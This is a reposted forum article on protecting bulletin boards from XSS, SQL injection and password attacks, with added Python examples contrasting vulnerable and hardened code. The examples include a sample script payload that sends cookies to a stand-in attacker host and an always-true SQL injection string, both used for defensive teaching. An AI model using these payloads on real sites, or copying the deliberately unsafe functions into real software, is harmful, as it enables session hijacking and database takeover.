I have a nice post from some forum; hopefully it's helpful for you.
When "internet security" is mentioned, most of you probably think of hackers, viruses, worms, and Trojan horses, none of which seem to apply to you. But the truth is that internet security is an important issue for anyone online, and it is especially significant for anyone running a web site. Forums are big targets for hackers and crackers, because bulletin board members may become argumentative and passionate about their differing opinions. If angered by a banning, a user might try to find nefarious means of rejoining or harming your forum!
What can you do to protect yourself? First, let me cover some background information and basics you should know about security. There are many different kinds of attacks that your forum may be susceptible to. The most common ones you will encounter are Cross-Site Scripting (XSS) exploits, SQL injections, and password cracking/abusing.
Cross-Site Scripting (XSS) exploits
XSS exploits usually depend on a malicious, specially crafted URL to execute arbitrary code (HTML, JavaScript, etc.) in a user's browser, which undermines the user's trust in your site. In layman's terms, it allows someone to embed their own HTML on your site. For example, an attacker could create a page that impersonates your forum's login screen but actually just steals a user's password when he or she enters it. Or, using JavaScript, an attacker could read information stored in a user's browser (cookies) and use that information to hijack the user's session and post under the user's account. NOT something that will add to your forum's popularity, that's for sure!
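The core of the defence against stored XSS in post bodies is output encoding: whatever a member typed is rendered as text, never as markup. The example below is an added illustration and is not code from the original post or from any forum package; the post bodies are constructed samples, and the `render_post_*` and `session_cookie_header` helpers are hypothetical names. It shows the vulnerable rendering beside the hardened one, and marks the session cookie `HttpOnly` so that even if script does slip through, `document.cookie` does not expose the session id.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample inputs (not from the article): one hostile post body
# that tries to ship the reader's cookies to a third party, and one benign
# post that merely happens to contain characters with HTML meaning.
HOSTILE_POST = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
BENIGN_POST = 'I think the <b>new</b> theme looks great & loads faster.'


def render_post_unsafe(body: str) -> str:
    """Vulnerable: the raw body is spliced into the page, so any HTML or
    script the member typed is executed by every reader's browser."""
    return f'<div class="post">{body}</div>'


def render_post_safe(body: str) -> str:
    """Hardened: every character with HTML meaning is entity-encoded, so the
    browser displays the text literally instead of interpreting it as markup."""
    return f'<div class="post">{html.escape(body, quote=True)}</div>'


def contains_active_content(rendered: str) -> bool:
    """Crude check used by this demo only: does the rendered HTML still
    contain a script tag a browser would execute?"""
    return '<script' in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    """Defence in depth: an HttpOnly, Secure session cookie is not readable
    from JavaScript, so a script that does run cannot simply read it."""
    cookie = SimpleCookie()
    cookie['session'] = session_id
    cookie['session']['httponly'] = True
    cookie['session']['secure'] = True
    cookie['session']['path'] = '/'
    return cookie.output(header='').strip()


if __name__ == '__main__':
    print('unsafe:', render_post_unsafe(HOSTILE_POST))
    print('safe:  ', render_post_safe(HOSTILE_POST))
    print('cookie:', session_cookie_header('abc123'))
```

Encoding at output time (rather than trying to strip "bad" tags on input) is the reliable approach: it does not depend on guessing every way a browser might interpret a partially filtered string.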
SQL injections
SQL injections can give an attacker access to your database. They happen when an unchecked variable used in a SQL statement can be modified (generally by the end user, with a malformed URL). What does that mean? Basically, a SQL injection can extend to the point where the attacker can run any SQL query, thus gaining the power to do almost anything an administrator could do. Obviously, this is a serious threat you want to protect against, as you don't want an attacker to gain complete control over your forum!
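The "unchecked variable" the paragraph describes is easiest to see side by side with the fix. The following is an added example, not code from the original post or from any forum software: it builds a constructed in-memory user table with Python's standard `sqlite3` module, then looks a member up once by pasting the request value into the SQL text (vulnerable) and once by binding it as a parameter (hardened). With the parameterised version the database treats the value purely as data, so quote characters in it can no longer change the shape of the query.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory forum user table for this demonstration."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)')
    conn.executemany(
        'INSERT INTO users (name, role) VALUES (?, ?)',
        [('alice', 'admin'), ('bob', 'member'), ('carol', 'member')],
    )
    conn.commit()
    return conn


def find_user_unsafe(conn: sqlite3.Connection, name: str) -> list:
    """Vulnerable: the request parameter is pasted straight into the SQL text,
    so a quote in the value ends the string literal and the rest of the
    value is parsed as SQL."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def find_user_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the value travels as a bound parameter; the query's shape
    is fixed before the value is ever seen."""
    return conn.execute(
        'SELECT name, role FROM users WHERE name = ?', (name,)
    ).fetchall()


def compare(name: str) -> dict:
    """Run the same lookup value through both versions and report how many
    rows each returned; a mismatch means the value altered the query."""
    conn = build_demo_db()
    return {
        'unsafe_rows': len(find_user_unsafe(conn, name)),
        'safe_rows': len(find_user_safe(conn, name)),
    }


if __name__ == '__main__':
    print('normal lookup :', compare('bob'))
    # Constructed malformed value: the classic always-true tail.
    print('malformed value:', compare("x' OR '1'='1"))
```

The same principle applies in PHP forums: prepared statements (PDO or mysqli with bound parameters) do for the forum what the `?` placeholder does here, and escaping by hand is the error-prone path the vulnerable function illustrates.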
Password cracking/abusing
Password cracking is when attackers try to force their way into an account, using a password list or generating random strings. These attempts are generally very weak, as most bulletin board systems will lock an account out after a few (generally, 5) unsuccessful login attempts. Password abusing is simply compromising the proper use of an account, such as a friend logging into his friend's account with a known password, or someone using a known password you use for your admin account. They could obtain this password from any other site you use it on (for example, a forum which does not encrypt passwords).
Why does all of this matter? As I have touched upon, these types of attacks can have huge effects on your community. A hacker could delete users, read/modify any thread, and even delete your forum. As I alluded to above, a hacker could modify posts or custom titles to include malicious HTML which could steal cookies (and allow them to log in under any user), or even utilize the newest Internet Explorer exploit. All of a sudden, it is not just your forum that could be in danger. Are you prepared? In this day and age, attacks are becoming more and more frequent.
Protect your members with these following tips:
* Use strong passwords, and change your password frequently. This should be obvious, but people neglect password security all the time. Use a strong password, which generally is a password 7 characters or longer with letters and numbers. The more complex your password is, the harder it is to crack, but do not make it so complex that you cannot easily remember it. Leaving a sticky note on your computer with the password can ruin any benefit from a strong password. Remind your members to keep their passwords private.
* Keep yourself informed of exploits that may affect you. At the bottom of this article are links that list the current public exploits. Searching for "vBulletin", "phpBB", etc. will show you exploits your forum may be susceptible to.
* Keep your bulletin board upgraded to the newest version.
* Add an additional password layer to your mod or admin control panels (more information here).
* Do not give FTP access to anyone else, even if it's only to a subdirectory. If someone can run PHP, they could easily steal your database login information and even set up phpMyAdmin (a popular database management tool). If you have to give FTP access out (for example, to moderators), use a different domain.
* Only install hacks from a trusted source. If you know PHP, examine all hacks you install. A malicious hack could gain complete control over your forum. Be very wary of hacks that use encrypted code.
* Do not use your forum to give private information to anyone (including PMs). In a recent security audit, I found cPanel login information in private messages after I gained database access. Be careful.
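The password section above and the first tip in this list describe three controls that belong together: a minimum strength rule (7+ characters with letters and numbers), storing passwords as salted hashes rather than in the clear (so a breached forum does not hand out reusable passwords), and locking an account after 5 failed logins. The example below is added here and is not code from the original post or from any bulletin board package; `AccountStore`, its method names, and the PBKDF2 iteration count are assumptions chosen for the demonstration.

```python
import hashlib
import hmac
import os
import re
from typing import Optional, Tuple

MAX_FAILED_ATTEMPTS = 5      # the lockout threshold the article cites as typical
PBKDF2_ITERATIONS = 200_000  # assumption: a reasonable work factor for this demo


def password_is_strong(pw: str) -> bool:
    """The article's rule of thumb: at least 7 characters with letters and digits."""
    return (len(pw) >= 7
            and re.search(r'[A-Za-z]', pw) is not None
            and re.search(r'\d', pw) is not None)


def hash_password(pw: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Salted PBKDF2-HMAC-SHA256; a per-user salt means equal passwords do not
    produce equal hashes, and the iteration count slows offline guessing."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', pw.encode('utf-8'), salt, PBKDF2_ITERATIONS)
    return salt, digest


class AccountStore:
    """Minimal in-memory account table: name -> salt, hash, failure counter, lock flag."""

    def __init__(self) -> None:
        self._accounts = {}

    def register(self, name: str, pw: str) -> bool:
        """Refuse weak passwords; store only the salted hash, never the password."""
        if not password_is_strong(pw):
            return False
        salt, digest = hash_password(pw)
        self._accounts[name] = {'salt': salt, 'hash': digest, 'failures': 0, 'locked': False}
        return True

    def login(self, name: str, pw: str) -> str:
        """Return 'ok', 'denied' or 'locked'. A locked account rejects even the
        correct password until an administrator unlocks it."""
        acct = self._accounts.get(name)
        if acct is None:
            return 'denied'
        if acct['locked']:
            return 'locked'
        _, digest = hash_password(pw, acct['salt'])
        # Constant-time comparison avoids leaking how many bytes matched.
        if hmac.compare_digest(digest, acct['hash']):
            acct['failures'] = 0
            return 'ok'
        acct['failures'] += 1
        if acct['failures'] >= MAX_FAILED_ATTEMPTS:
            acct['locked'] = True
            return 'locked'
        return 'denied'

    def unlock(self, name: str) -> None:
        """Administrative reset after the owner has been verified out of band."""
        acct = self._accounts[name]
        acct['failures'] = 0
        acct['locked'] = False


if __name__ == '__main__':
    store = AccountStore()
    print('register weak   :', store.register('bob', 'weak'))
    print('register strong :', store.register('alice', 'forum2024pass'))
    print('correct login   :', store.login('alice', 'forum2024pass'))
    for _ in range(MAX_FAILED_ATTEMPTS):
        print('wrong guess     :', store.login('alice', 'wrong123x'))
    print('after lockout   :', store.login('alice', 'forum2024pass'))
```

The lockout is what makes online guessing "generally very weak" as the article says; the salted hash is what protects your members when the attacker is not guessing but reading a copied database.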
Is your security hopeless? Hardly. By being smart about your forum's security, you can easily help protect the boards, yourself, and your members. If you ever see any suspicious activity, change your password and do not be afraid to ask for help.
Resources
The following links can be very helpful in securing your forum:
* SecurityFocus
* Packet Storm
* vBulletin Bug Tracker
* milw0rm